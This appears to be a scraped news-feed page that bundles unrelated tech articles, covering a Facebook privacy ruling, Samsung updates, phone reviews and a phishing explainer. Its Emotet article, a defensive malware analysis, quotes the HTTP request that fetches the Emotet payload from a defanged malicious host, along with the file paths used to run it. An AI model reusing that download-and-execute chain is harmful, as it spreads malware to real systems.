Facebook illegally processed user data, says court

andreasc
-
0
Facebook illegally processed user data, says court
[ad_1]

Two European privacy watchdogs have won cases against Meta. The rulings may have serious consequences for European website owners.

The Amsterdam court has ruled that Facebook illegally processed user data in a case started by the Dutch Data Privacy Stichting (DPS), a foundation that acts on behalf of victims of privacy violations in the Netherlands.

According to the ruling, Facebook used personal data for advertising purposes in the period April 1, 2010, to January 1, 2020, when this was not allowed. The same ruling also says that Facebook shared personal data with third parties without any legal basis to do so, and without informing the users themselves. Without properly informing users there can be no consent.

The DPS and the Dutch Consumentenbond—a consumers association with over 400,000 members—filed a class-action suit against Facebook Ireland, which is the European subsidiary of Meta that oversees the processing of Dutch user data. This ruling doesn’t mean damages can yet be claimed by the 185,000+ people that are represented in the class-action suit, but it’s one step closer. Based on this ruling, the group now hopes to sit down with Facebook to negotiate a settlement. Any of the roughly 10 million Dutch people who used Facebook during the relevant period can join if the case moves to a damages phase.

The main complaints were that Facebook used personal data for advertising and shared data like sexual preferences and religion with third parties. The data in question were both provided by the users themselves and derived by Facebook from the users’ browsing behavior outside of Facebook itself. Facebook not only shared users’ personal data with third parties but also the personal data of their Facebook friends.

Facebook was cleared of the complaint that it placed cookies on third party websites. The court ruled that it transferred the responsibility for those cookies to the website owners, and had the right to do so. Facebook was also cleared of enrichment charges as the court found not enough proof that Facebook’s monetary gain from these actions resulted in direct damages to the users.

A spokesperson for Meta said the company was “pleased” with parts of the decision but would appeal others, noting that some of the claims date back more than a decade.

Austria

In Austria, the Datenschutzbehörde (DSB) ruled that a complaint that Meta’s tracking pixels by the privacy organization noyb were conflicting with European GDPR rules was partially upheld. The website owner was found in conflict with GDPR regulations because personal data of users (at least unique user identification numbers, IP address and browser parameters) were transferred to the USA in a data transfer without ensuring an adequate level of protection.

Last year the Austrian privacy watchdog ruled against Google Analytics as being in conflict with GDPR regulations. According to noyb, the same rules apply to Facebook Login and Meta Pixel because these tools also send data to the US.

Together these rulings may have serious consequences for all European based website owners. Because of the transferred responsibility the website owners take on by using these tools, they can be held liable for the fact that Meta and Google send data to the US without ensuring an adequate level of protection.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW


[ad_2]
Source link

Galaxy S23, Galaxy S20 & A53 5G get March update in the US

andreasc
-
0
Galaxy S23, Galaxy S20 & A53 5G get March update in the US
[ad_1]

Samsung‘s March update is available for more Galaxy devices in the US. The Galaxy S23 series, Galaxy S20 series, and the Galaxy A53 5G are picking up the latest security patch stateside. They join the Galaxy S22, Galaxy S21, Galaxy Note 20, and all recent Galaxy Z series foldables in the party.

The March SMR (Security Maintenance Release) for the Galaxy S23, Galaxy S23+, and Galaxy S23 Ultra is available widely for both carrier-locked and unlocked variants in the US. The updated firmware build number for the former is S91*USQS1AWBM while that for the latter is S91*U1UES1AWBM. Samsung doesn’t seem to be pushing any new features to the devices with this release. That isn’t surprising, though. The handsets have just arrived on the market. You can expect feature updates for the phones in the coming months.

Likewise, the Galaxy S20, Galaxy S20+, and Galaxy S20 Ultra are fresh from the One UI 5.1 update and are only getting the latest security update today. As of this writing, Samsung is pushing the March SMR to the factory-unlocked variants of its 2020 flagships in the US. The new firmware version for the phones is G98*U1UES3HWB5. Carrier-locked units should follow in the coming days. The update for the unlocked units is rolling out widely on most wireless networks stateside, including AT&T, T-Mobile, and Verizon.

This month’s security update is also available for the Galaxy A53 5G in the US. The rollout began recently for carrier-locked models. The handset is getting the update with the firmware build number A536USQS4CWC2. Users with an unlocked unit of the 2022 premium mid-ranger can expect to receive this software release in the coming days. Don’t expect any new features, though. Like the Galaxy S20 series, your phone also recently picked up the One UI 5.1 update with a host of goodies. The latest release is all about vulnerability fixes.

March update for Galaxy devices contains several dozen security patches

Samsung has been rolling out the March update for its Galaxy smartphones and tablets since early last week. It has already pushed the new SMR to most of its recent flagship models and a few mid-rangers. The update contains patches for more than 60 vulnerabilities that affect various system components across the Galaxy lineup. About 20 of those are Galaxy-specific vulnerabilities while the remaining flaws affect the entire Android ecosystem. You can go to Settings > Software update on your Galaxy smartphone and tap on Download and install to check for new updates.


[ad_2]
Source link

Microsoft laid off an AI ethics team

andreasc
-
0
Microsoft laid off an AI ethics team
[ad_1]

According to Arstechnica (via Platformer), Microsoft has just axed an AI ethics team following the mass layoffs within the company that affected 10,000 employees. The team was responsible for monitoring and reducing the social harms caused by Microsoft AI products.

Microsoft has been making the headlines in recent months for its initial investment in ChatGPT parent company OpenAI and integrating it into its Bing search engine. While all companies that incorporate AI into their products and services have a team to examine the possible associated dangers, Microsoft just laid off its AI ethics team members.

The team reportedly developed a “responsible innovation toolkit” for Microsoft that helped the company’s engineers to predict and eliminate the risks generated by the AI. Former team members say they had a key role in mitigating AI risks in Microsoft products.

Microsoft AI ethics team left the company following recent layoffs

In response to the news, Microsoft announced it remains “committed to developing AI products and experiences safely and responsibly, and does so by investing in people, processes, and partnerships that prioritize this.”

The company also says it has focused on building its Office of Responsible AI in the past six years. This team remains in place and works with the Aether Committee and Responsible AI Strategy in Engineering to mitigate AI risks.

Microsoft’s decision to lay off an AI ethics team coincides with the launch of OpenAI’s most advanced AI model, GPT-4. This model is added to Microsoft Bing, which can stoke even more interest in Google’s rival.

Microsoft started forming its AI ethics team in 2017, and the team reportedly had 30 members. The Platformer reports that the company later scattered the members into different departments as AI competition with Google was heating up. Finally, Microsoft downsized the team to only seven people.

The former employees also claim Microsoft didn’t listen to their recommendations for AI-driven tools like Bing Image Creator that copied artists’ work. The axed employees are now concerned about the possible dangers that AI can expose to users when there’s no one in the company to say “no” to the potentially irresponsible designs.


[ad_2]
Source link

Emotet adopts Microsoft OneNote attachments

andreasc
-
0
Emotet adopts Microsoft OneNote attachments
[ad_1]

Emotet finally got the memo and added Microsoft OneNote lures.

Last week, Emotet returned after a three month absence when the botnet Epoch 4 started sending out malicious emails with malicious Office macros. While the extracted attachments were inflated to several hundred megabytes, it was surprising to see that Emotet persisted in using the same attack format.

Indeed, Microsoft has been rolling out its initiative of auto-blocking macros from downloaded documents since last summer. This has forced criminals to revisit how they want to deliver malware via malspam. One noticeable change was the use of Microsoft OneNote documents by several other criminal gangs. Now, it is Emotet’s turn to follow along.

The OneNote file is simple but yet effective at social engineering users with a fake notification stating that the document is protected. When instructed to double-click on the View button, victims will inadvertently double-click on an embedded script file instead.

This triggers Windows scripting engine (wscript.exe) to execute the following command:

%Temp%\OneNote\16.0\NT\0\click.wsf"

The heavily obfuscated script retrieves the Emotet binary payload from a remote site

GET https://penshorn[.]org/admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org

The file is saved as a DLL and executed via regsvr32.exe:

%Temp%\OneNote\16.0\NT\0\rad44657.tmp.dll"

Once installed on the system, Emotet will then communicate with its command and control servers to receive further instructions.

As Emotet ramps up its malspam distribution, users should be particularly careful of this threat which we featured in our 2023 State of Malware Report, as it serves as an entry point for other threat actors keen on dropping ransomware.

Malwarebytes customers are protected against this threat at several layers within its attack chain including web protection, malware blocking. Our EDR product also flags the whole sequence:

Although Emotet has had vacations, retirements and even been taken down by authorities before, it continues to be a serious threat and highlights how social engineering attacks are so effective. While macros may soon be a thing of the past, we can see that threat actors can leverage a variety of popular business applications to achieve their end goal of gaining a foothold onto enterprise networks.

We will continue to monitor any new developments with Emotet to ensure our customers remain protected.

Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED


[ad_2]
Source link

Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro

andreasc
-
0
Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro
[ad_1]

This time around, we’re here to compare the best of Samsung and Huawei, at the moment. In other words, we’ll compare the Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro. Both of these are big and bold flagship smartphone offerings from the two companies. They are quite different, though, in many ways. They do look different, and feel entirely different in the hand. Their internals differ quite a bit, and even their software.

We’ll first list their specifications, and will then move to compare them across a number of categories. We’ll compare their designs, display, performance, battery life, cameras, and audio performance, as per usual. Before we get started, do note that the Mate 50 Pro comes without Google services, it includes Huawei services. That being said, let’s get going, shall we?

Specs

Samsung Galaxy S23 UltraHuawei Mate 50 Pro
Screen size6.8-inch QHD+ Dynamic AMOLED 2X display (curved, 120Hz adaptive refresh rate, LTPO, down to 1Hz, 1,750 nits peak brightness)6.74-inch QHD+ curved OLED display (120Hz refresh rate)
Screen resolution3080 x 14402616 x 1212
SoCQualcomm Snapdragon 8 Gen 2 for GalaxyQualcomm Snapdragon 8+ Gen 1
RAM8GB/12GB (LPDDR5X)8GB (LPDDR5)
Storage256GB/512GB/1TB, non-expandable (UFS 4.0)256GB/512GB, expandable (UFS 3.1)
Rear cameras200MP (f/1.7 aperture, 24mm lens, 0.6um pixel size, multi-directional PDAF, Laser AF, OIS)
12MP (ultrawide, Dual Pixel AF, 120-degree FoV, f/2.2 aperture, 1.4um pixel size)
10MP (telephoto, Dual Pixel AF, OIS, f/2.4 aperture, 1.12um pixel size, 70mm lens, optical zoom 3x)
10MP (telephoto, Dual Pixel AF, OIS, f/4.9 aperture, 1.22um pixel size, 230mm lens, 10x optical zoom, 100x Space Zoom)		50MP (f/1.4-f/4.0, 24mm lens, wide angle, OIS, PDAF, Laser Autofocus)
13MP (f/2.2 aperture, 13mm lens, 120-degree FoV, ultrawide, PDAF)
64MP (f/3.5 aperture, 90mm lens, OIS, PDAF, 3.5x optical zoom)
Front cameras12MP (f/2.2 aperture, 26mm lens, Dual Pixel PDAF)13MP (ultrawide, f/2.4 aperture, 18mm lens)
ToF 3D (depth/biometrics)
Battery5,000mAh, non-removable, 45W wired charging, 15W Qi wireless charging, 4.5W Wireless PowerShare
Charger not included		4,700mAh, non-removable, 66W wired charging, 50W wireless charging, 5W reverse wireless charging
Charger included
Dimensions163.4 x 78.1 x 8.9mm162.1 x 75.5 x 8.5mm
Weight234 grams205 grams (vegan leather)/209 (glass) grams.
Connectivity5G, LTE, NFC, Bluetooth 5.3, Wi-Fi, USB Type-C4G LTE, NFC, Bluetooth 5.2, Wi-Fi, USB Type-C
SecurityIn-display fingerprint scanner (ultrasonic)In-display fingerprint scanner (optical)
OSAndroid 13
One UI 5.1		Android 12
EMUI 13
Price$1,199.99/$1,299/$1,399/TBA (1TB)€1,299
BuySamsungHuawei

Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro: Design

The moment you lay your eyes on these two phones, you’ll see they’re obviously different. The Galaxy S23 Ultra has sharp corners, and its top and bottom sides are completely flat. The phone is made out of metal and glass. The Huawei Mate 50 Pro, on the other hand, has curved corners, and generally a more curvy design. Its frame is made out of metal, while the phone includes a vegan leather or glass backplate. Do note that we’ve reviewed the model with a vegan leather backplate.

Samsung’s flagship is a bit taller, noticeably wider, and slightly thicker than the Huawei Mate 50 Pro. It is also considerably heavier than both glass and vegan leather Mate 50 Pro models. It weighs 234 grams, while the two aforementioned Mate 50 Pro models weigh 209 and 205 grams, respectively. The vegan leather Mate 50 Pro that we reviewed is a lot less slippery than the Galaxy S23 Ultra, which is not surprising. And yes, you will feel the weight of the Galaxy S23 Ultra in comparison.

The Galaxy S23 Ultra has a centered display camera hole, while the Mate 50 Pro includes a notch up top. Both devices have immensely thin bezels. Their rear camera modules do differ quite a bit. Each of the cameras protrudes straight from the back of the Galaxy S23 Ultra. The Mate 50 Pro has a circular camera island on the back, that includes all of the phone’s cameras and sensors. Both phones scream “premium”, basically. They feel like truly well-built, premium phones, and they both offer an IP68 certification for water and dust resistance.

Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro: Display

The Galaxy S23 Ultra features a 6.8-inch QHD+ (3088 x 1440) Dynamic AMOLED 2X display. That panel is slightly curved, and it offers an adaptive refresh rate of up to 120Hz. It also supports HDR10+ content, and it gets quite bright, actually. This panel goes up to 1,750 nits of peak brightness. The Gorilla Glass Victus 2 can be found on the phone’s front, as it’s protecting the display.

Samsung Galaxy S23 Ultra Review AM AH 09

The Huawei Mate 50 Pro, on the other hand, has a 6.74-inch 2616 x 1212 OLED display. That panel can project up to 1 billion colors, and it offers a 120Hz refresh rate. This is not an LTPO panel, though. The phone’s display has a 19.5:9 aspect ratio, and it is curved. This panel is protected by the Huawei Kunlun Glass, which has proven to be quite tough, even in direct drop tests with the Galaxy S23 Ultra.

Now, the Galaxy S23 Ultra technically has a better display thanks to the fact it offers an adaptive refresh rate, and it gets a bit brighter outdoors. Truth be said, however, the Huawei Mate 50 Pro has an outstanding panel, and the vast majority of people wouldn’t even notice the difference. You will notice it if you’re in direct sunlight, but the Mate 50 Pro gets plenty bright too. On top of that, it offers extremely good protection on the front. Both of these displays are great. They offer vivid colors, great viewing angles, and good touch response too.

Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro: Performance

The Snapdragon 8 Gen 2 for Galaxy fuels the Galaxy S23 Ultra. That is basically a slightly overclocked variant of the Snapdragon 8 Gen 2, one of the best chips on the market. The phone also includes 12GB of LPDDR5X RAM and UFS 4.0 flash storage. The Mate 50 Pro is fueled by the Snapdragon 8+ Gen 1 SoC, while the phone packs in 8GB of LPDDR5 RAM and UFS 3.1 flash storage.

The Galaxy S23 Ultra is technically the more powerful smartphone. It is newer, and it includes more powerful performance-related internals. Therefore, it’s also technically more future-proof. The Huawei Mate 50 Pro is nothing to scoff at, and you probably won’t even notice the difference in sheer power on the performance side of things. The Mate 50 Pro flies through everything you throw at it, just like the Galaxy S23 Ultra. That Snapdragon 8+ Gen 1 is an outstanding chip, with great power consumption.

When it comes to regular, everyday tasks, both phones are extremely snappy. Opening and closing apps, browsing, consuming multimedia, photo and video editing… and much more, they both do a great job at those. The same goes for gaming, both phones can run even the most demanding games. You may notice some differences if you run the most demanding ones, but both phones are more than powerful to push through. We were impressed by the performance on both sides.

Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro: Battery

The Galaxy S23 Ultra features a 5,000mAh battery on the inside. The Huawei Mate 50 Pro utilizes a 4,700mAh battery. Now, the Huawei Mate 50 Pro battery life is not bad, not at all, but the Galaxy S23 Ultra beats out almost every other flagship at the moment. The OnePlus 11 can compete in that regard, but the Galaxy S23 Ultra’s battery life is just insane. We were able to get around 9-10 hours of screen-on-time on the phone, without a problem. The Mate 50 Pro lingered between 7 and 8 hours most of the time.

Do note that these numbers usually don’t include any gaming, but they include pretty much everything else. That goes for image editing, video editing, browsing, multimedia consumption, messaging, social media networks, and so on. Gaming and other processor-intensive tasks will, of course, have a negative impact on the battery life. That also includes sharing a hotspot, in case that wasn’t clear. Your mileage may also vary, as we have different usage habits, use different apps, and then there’s the signal strength, and so on.

When charging is concerned, the Mate 50 Pro blows the Galaxy S23 Ultra out of the water. The Huawei Mate 50 Pro not only comes with a charger in the box, but it supports 66W wired, 50W wireless, and 5W reverse wireless charging. The Galaxy S23 Ultra does not include a charger, while it supports 45W wired, 15W wireless, and 4.5W reverse wireless charging.

Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro: Cameras

Both of these smartphones offer excellent camera hardware, and excellent camera performance too, but… they do differ quite a bit. The Galaxy S23 Ultra has a 200-megapixel main camera, a 12-megapixel ultrawide unit (120-degree FoV), a 10-megapixel telephoto camera (3x optical zoom), and a 10-megapixel periscope telephoto camera (10x optical zoom, 100x Space Zoom). The Huawei Mate 50 Pro includes a 50-megapixel main camera (f/1.4-f/4.0 aperture), a 13-megapixel ultrawide unit (120-degree FoV), and a 64-megapixel periscope telephoto camera (3.5x optical zoom, 100x digital zoom).

AH Huawei Mate 50 Pro image 35

These two phones have an entirely different approaches to photography. As this is not a full review, we’ll just hit the most important aspects. The Galaxy S23 Ultra does a great job with its main camera. It offers plenty of details, and if you need more, you can always use a full 200MP mode. It does a great job with neon signs, and with HDR, most of the time. The Huawei Mate 50 Pro’s adjustable aperture is not a gimmick, not at all. The phone adapts to the situation, and takes the shot. This is still one of the most consistent smartphone cameras we’ve used. It does a great job in HDR situations, and also in low light.

The ultrawide cameras on both phones are great, and mostly in line with the main unit in terms of color science. The Galaxy S23 Ultra wins the video recording aspect, but not by a lot. It also wins the periscope aspect, but it’s also quite close. We do find the Huawei Mate 50 Pro’s main and ultrawide cameras to be more consistent, as they rarely miss. So… it’s up to you, both are outstanding in the camera department.

Audio

There is a set of stereo speakers on each of these devices. They actually provide really, really good speakers, better than most. The sound is loud, and there’s plenty of detail too. You’ll get some bass out of both smartphones, and there’s no noticeable distortion. We really don’t have much to complain about here.

If you need an audio jack, however, you won’t find it here, on either phone. For wired connections, you’ll need to use the Type-C port, which both of these phones have. For wireless connections, the Galaxy S23 Ultra and Huawei Mate 50 Pro are equipped with Bluetooth 5.3 and 5.2, respectively.


[ad_2]
Source link

The Waze map app now displays EV charging stations

andreasc
-
0
The Waze map app now displays EV charging stations
[ad_1]

Finding EV charging stations is sometimes a bit of a hassle, but the Waze map app is here to save the day. A recent update to this app is adding charging stations to aid users to find the nearest place to charge up if there is a need. Electric vehicle owners will find this new feature on the navigation app quite helpful.

With most regions switching from fuel-driven cars to electric options, there is a need to fit into the entire EV process. This involves understanding the driving range on a full charge and pinpointing charging stations around you. Getting familiar with charging stations in your locality might not be hard, but how about other locations?

It’d be nerve-racking to find all the charging stations in the region you live all by yourself. But having an app that could direct you to nearby charging stations would be great. Waze is now making the search for a charging station while driving less stressful.

Easily locate EV charging stations with the Waze map app

A recent update to the Waze map app brings EV charging stations to the navigation platform. While driving your EV in an area you aren’t familiar with, just pull up your Waze map app and spot the nearest charging station. This will save you the stress of asking for directions and also get you to the station just in time before your EV’s battery runs out.

Since most regions are still gradually adapting to EVs, there might be lots of changes to the location of charging stations. This poses a challenge to locating a charging station on most maps. Waze, for its part, provided a solution to this problem, hence making its new update more reliable for EV owners.

To accurately pinpoint an EV charging station, Waze will rely on local Map Editors from its community. All location data fed to the maps’ platform is constantly reviewed to keep it up to date. So the map will constantly be updated once a new station is set up or taken down in various locations.

Regardless of the route you take, Waze will inform you about nearby charging stations if there are any. This is an impressive feature and will prove helpful to EV owners around the world. Over the coming weeks, the Waze map app update with this feature will roll out to one region after another.


[ad_2]
Source link

What is phishing?

andreasc
-
0
What is phishing?
[ad_1]

Phishing is a social engineering tactic that sees hackers attempt to gain access to personal or confidential information by posing as a legitimate company. In this article, Cyber Security Hub’s editor Olivia Powell explores what phishing attacks are, why malicious actors launch phishing attacks and how companies can protect themselves against them.

For our guide explaining the different types of malware and how this can affect your business, visit Cyber Security Hub’s Ultimate guide to malware.  

Contents

  • Why do hackers launch phishing attacks?
  • Phishing attacks that target individuals
  • Phishing attacks that target companies
  • Phishing attacks and cryptocurrency
  • How to protect against phishing attacks

Why do hackers launch phishing attacks?

Phishing attacks soared in 2022, with international consortium and fraud prevention group the Anti-Phishing Working Group recording a total of 3,394,662 phishing attacks in the first three quarters of 2022. There were 1,025,968 attacks in Q1, growing to 1,270,883 attacks in the third quarter, with each quarter breaking the record as the worst quarter APWG has ever observed.

Ernie Moran, general manager of automated prepaid card fraud protection software Arden at financial protection service Brightwell, believes that 2023 will continue to see a rise in phishing attacks due to more people turning to cyber crime for financial gain.

“The downturn in the economy this year will almost certainly lead to an increase in individuals taking additional risks to commit fraud in 2023, but many financial organizations are still unprepared to identify and take action on a coordinated and targeted fraud attack,” he explains.

“The downturn in the economy this year will almost certainly lead to an increase in individuals taking additional risks to commit fraud” – Ernie Moran, general manager of Arden at Brightwell

This financial gain may be from harvesting personal or banking information from individuals and either using or selling it. It may also be gained via accessing confidential information held by companies. They may do this with the goal of extorting the company, or to sell the stolen information to other bad actors on the dark web.

Malicious actors can use a variety of channels to send phishing attempts including texts, social media messages and emails. They can also use a variety of phishing techniques in order to gain access to this information.

Phishing attacks that target individuals

Malicious actors that use phishing attacks against individuals pose as legitimate companies. This is because victims are more likely to click on a link from a source they believe is trustworthy. These attacks are often used to harvest login credentials, personal data or payment information from victims, which can either be sold to other bad actors on the dark web or used to commit credit card fraud or identity theft.

These phishing scams are supposed to appear legitimate, so they often use channels typically deployed by companies to communicate with their customers, like email. As an example, I recently received an email from hackers attempting to phish me by posing as Apple.

The use of a spoofed ‘no reply’ email address and a reference number also serve to make it look more legitimate.

Malicious actors may also use text-based phishing, known as SMSishing or smishing, to pose as a genuine company.  

Starting in November 2020 in the UK, a number of people reported being targeted by phishing attacks where malicious actors posed as the Royal Mail service, claiming that they needed to pay a fee for a parcel to be delivered. As potential victims are used to receiving updates from delivery services including Royal Mail via text message, this makes the message seem more legitimate. 


Image source: the Royal Mail website

If someone entered their card details onto the site, their payment details were harvested. These details may have been sold on dark web sites dedicated to the trading and unauthorized use of credit card details, known as carding sites.  

With 134 in every 1000 people in the UK becoming a victim of credit card fraud per year, with an annual cost of £8,833.20 (US$10,626.30) per 1000 people, phishing attacks like these are doing significant damage.

Phishing attacks that target companies

Companies and their employees can also be targeted by phishing attacks. These attacks are referred to as spear phishing attacks.

These types of attacks are increasingly common, with the majority (65 percent) of cyber attackers using spear phishing as their primary attack vector, according to cyber security company Phishing Box.

Their aim is to either harvest data belonging to the businesses’ customers, or to access data belonging to the business itself. 

Phishing attacks to harvest customer data

Malicious actors may use spear phishing attacks to harvest large amounts of customer data held by said companies. They may do this to extort companies using the threat of a data leak, to sell the information over the dark web or to data brokers, or to use the data for other nefarious purposes including identity theft.

A phishing attack in August 2022 against communications company Twilio led to 163 companies, each with hundreds of customers of their own, being affected by a data breach directly tied to the attack.

The breach, dubbed Oktapus by researchers, involved a targeted phishing attack against Twilio employees to gain unauthorized access to the company’s servers and its customer data.  

The communications platform disclosed that it identified 163 Twilio customers whose “data was accessed without authorization for a limited period of time”. In addition, 93 users of the two-factor authentication app Authy, which Twilio owns, saw their accounts accessed and additional devices registered by bad actors. Following the breach, Twilio notified all users that had their accounts accessed and has removed all unauthorized devices.

After the attack took place, a number of companies reported that their customer data was compromised during the breach, including messaging app Signal, who reported 1,900 users may have had their phone numbers revealed to hackers, with some users directly targeted.

Food delivery company DoorDash said that a “small percentage of individuals whose data is maintained by DoorDash” had their personal data including name, email address, delivery address and phone number. In addition, a smaller number of customers had their “basic order information and partial payment card information” accessed during this data breach.

In response to the attack, Twilio enforced “a number of additional measures internally to protect against these attacks”, including “hardening security controls at multiple layers”. 

Phishing attacks to harvest company data

Malicious actors may also use spear phishing attacks to harvest data relating to the company itself, for example information used to access the company’s network, source code information or other proprietary data. 

In October 2022, cloud storage company Dropbox had its source code stolen by hackers after its employees were targeted by a phishing attack.

The attack saw a malicious actor pose as code integration and delivery platform CircleCI in order to harvest login credentials and authentication codes from employees.  It was also able to access Dropbox’s account on code repository site GitHub, as CircleCI login information can be used to log in to the site.  

Through the attack, the hacker gained access to some of the code Dropbox stores on the platform, including API keys used by its developers.

Dropbox was alerted to the breach by GitHub after suspicious activity was noticed on its account. The hacker was able to access and copy the code for 130 of Dropbox’s code repositories, although this did not contain any code for its core apps or infrastructure. 


 
Image source: Yancy Min on Unsplash 

Dropbox assured users that the threat actor did not gain access to the contents of any Dropbox accounts, passwords or payment information. Instead, the hacker was able to access a “few thousand names and email addresses belonging to Dropbox employees, current and past customers, sales leads and vendors”. The company said the risk to those who had their information accessed in the breach was “minimal”, but all those affected were contacted.

GitHub itself reported a similar phishing attack in September 2022, involving a malicious actor posing as CircleCI to gain access to various user accounts.

The phishing site used by the hacker relayed time-based-one-time-passwords (TOTP) used for two-factor-authentication codes to the hacker in real time, allowing them to gain access to accounts protected by TOTP two-factor authentication. Accounts protected by hardware security keys were not vulnerable to this attack.

Through the attack, the malicious actor was able to gain access to and download multiple private code repositories. This enabled it to use techniques to preserve its access to the account even in the event that the compromised user or organization changed their password.

Phishing attacks and cryptocurrency

Bad actors launching phishing attacks primarily do so for financial gain, whether this is through the theft of payment or banking information, or by selling information gathered through phishing attacks.

With Bitcoin, Ethereum and Tether having market caps of $330.6bn, $152.6bn and $68.2bn respectively, cryptocurrency traders and wallets can be an attractive target for phishing attacks. So much so that Blockchain data platform Chainanalysis reported that a total of $3.8bn in cryptocurrency was stolen in 2022. 

Phishing attacks against those who own cryptocurrency can have large payouts. In October 2022, a hacker known as Monkey Drainer used phishing attacks to steal $1mn worth of Ethereum and NFTs in just 24 hours

Monkey Drainer is notorious for using phishing-based hacking techniques to steal from victims by setting up fake cryptocurrency and NFT sites.

To make these fake sites more believable, Monkey Drainer has been known to pose as legitimate blockchain sites including RTFKT and Aptos. After logging in to the fraudulent sites, victims enter sensitive details about their cryptocurrency wallets and sign off on transactions,  allowing Monkey Drainer to access their wallets and their funds.

The most prominent victims in the October 2022 attack were referred to only as 0x02a and 0x626. The pair lost a collective $370,000 via malicious phishing sites operated by Monkey Drainer, with 0x02a losing 12 NFTs worth around $150,000.

0x626 held around $2.2mn in their cryptocurrency wallet at the time, however, some of the transactions pushed by Monkey Drainer were rejected by the network the wallet was held on, as they were marked as suspicious. This meant that the overall actual loss was $220,000 worth of cryptocurrency.

Preventing phishing attacks

Teri Radichel, author of Cybersecurity for Executives in the Age of Cloud and CEO of cyber security training and consultancy company 2nd Sight Lab, says that is clear that attacks leveraging phishing and credentials are not going away.

When building their security strategy and threat defense protocols, Radichel suggests that companies “use a layered security approach to prevent damage if and when attackers compromise credentials”, both to defend against and mitigate these attacks. Additionally, Radichel notes that attackers are moving beyond basic web attacks to more sophisticated forms of attacks by leveraging automation and cloud environments. 


 
Image source: the UK National Cyber Security Center (NCSC)

When considering phishing attacks that target individuals, the Canadian Center for Cyber Security (CCCS) provides the following advice:

  • Verify links before you click them. Hover over the link to see if the info (sender/website address) matches what you expect.
  • Avoid sending sensitive information over email or texts. 
  • Back up information so that you have another copy. 
  • Apply software updates and patches.
  • Filter spam emails (unsolicited junk emails sent in bulk).
  • Block IP addresses, domain names, and file types that you know to be bad 
    Call the sender to verify legitimacy (e.g. if you receive a call from your bank, hang up and call them).
  • Use anti-phishing software that aligns with the Domain-based Message Authentication, Reporting, and Conformance (DMARC) policy 
    Reduce the amount of personal information you post online (e.g. phone numbers and extensions for employees).
  • Establish protocols and procedures for your employees to internally verify suspicious communications. This should include an easy way for staff to report phishing attacks.
  • Use multi-factor authentication on all systems, especially on shared corporate media accounts.

[ad_2]
Source link

Best Google Pixel 7 Cases

andreasc
-
0
Best Google Pixel 7 Cases
[ad_1]

The Google Pixel 7 is set to be one of the best smartphones of 2022. Not because of what it offers, by itself, but combined with its starting price of $599. Which is pretty impressive, when most flagships are priced at $999 or higher. The Pixel 7 is still a fragile smartphone though, and is made of a glass back and front. So you’re going to want to get a case for you new Pixel 7.

So we’re here to round up the best cases for your Google Pixel 7. If you’re looking for the best Pixel 7 Pro cases, we’ve rounded those up here.

Best Google Pixel 7 Cases

In this list, you’ll find a lot of options from Spigen, that’s because Spigen is a new “Made By Google” partner here, and offers almost 10 cases for the Pixel 7. Which is rather impressive. But there are also cases from Caseology, Ringke and Google in this list.

Google Pixel 7 Case

pixel 7 leak images 6

Google offers this case for the Pixel 7  in three colors: Lemongrass, Chalk and Obsidian. Basically, they match the colors that the Pixel 7 is available in. These are TPU cases, but they are a bit of an upgrade over last year’s cases from Google. These are a bit thicker, making the camera bump a bit more flush. They also have more grip and actually feel good in the hand.

Google Pixel 7 Case – Google Store

Spigen Slim Armor CS

51HCG3bW7lL AC SL1200

  • Price: $18
  • Where to buy: Amazon

Spigen makes some really great cases for the Pixel 7. And that includes the Slim Armor CS. This is a slim, somewhat, case. That has a backdoor that slides off to review your cards. Making it a wallet case, but the cards are kind of hidden away. This is available in Rose Gold and black. So you can get the color that you want.

Spigen Slim Armor CS – Amazon

Spigen Rugged Armor

61uqWRT4RJL AC SL1200

  • Price: $15
  • Where to buy: Amazon

The Spigen Rugged Armor is a matte black case for the Pixel 7. It offers some great protection, including a lip over the display. Which is going to keep it from shattering when you drop your phone. It also is made of TPU, but still has reinforced edges and corners for impact.

Spigen Rugged Armor – Amazon

Spigen Ultra Hybrid

61D88K UYkL AC SL1200

  • Price: $15
  • Where to buy: Amazon

This is a clear case from Spigen for the new Google Pixel 7. It also offers up anti-yellowing technology, so you won’t see this one turning the same color as the Lemongrass Pixel 7, and that’s a good thing here. It will also have cut outs for the camera bar on the back, and almost make it flush with the back of the phone.

Spigen Ultra Hybrid – Amazon

Caseology Parallax

61zWhg9lOTL AC SL1080

  • Price: $17
  • Where to buy: Amazon

The Caseology Parallax is also a case that almost always makes it onto these lists. It’s just a really good case that also comes in some sweet colors. What makes the Parallax such a great phone is the fact that it is featuring a 3D texture on the back. That not only looks cool, but it also helps with grip. So it is less likely to slip out of your hands. And that’s always a good thing.

Caseology Parallax – Amazon

Incipio Grip

gg 095 blk incipio grip pixel7 c 1024x1024

The Incipio Grip is a nice TPU case that also adds some grip on the sides. That’s going to help you hold onto your phone. It’s also rated for up to a 14-foot drop. Which is really good to see. It has been made out of molecular recycled material. And it uses an antimicrobial technology that can prevent 99.9% of surface bacterial and germs.

Incipio Grip – Incipio

Spigen Liquid Air

71xbqBWj6lL AC SL1200

  • Price: $15
  • Where to buy: Amazon

The Spigen Liquid Air is a really cool looking case for the Pixel 7. It has cool little triangles on the back that help with grip, and also look cool. It’ll help keep the Pixel 7 in your hands, which is always good. It’s available in matte black and navy blue.

Spigen Liquid AIr – Amazon

Ringke Onyx

71snAAaVE6L AC SL1500

  • Price: $15
  • Where to buy: Amazon

This is another case that we typically include in our buyer’s guides, because they are so good. This is a pretty thin case that also offers up a ton of protection for your new Google Pixel 7. It is available in black and dark green. It’s also shockproof and rugged. So it can handle a few drops. Of course, we’d still recommend not doing that.

Ringke Onyx – Amazon

Spigen Tough Armor

61XEvI66ZRL AC SL1200

  • Price: $17
  • Where to buy: Amazon

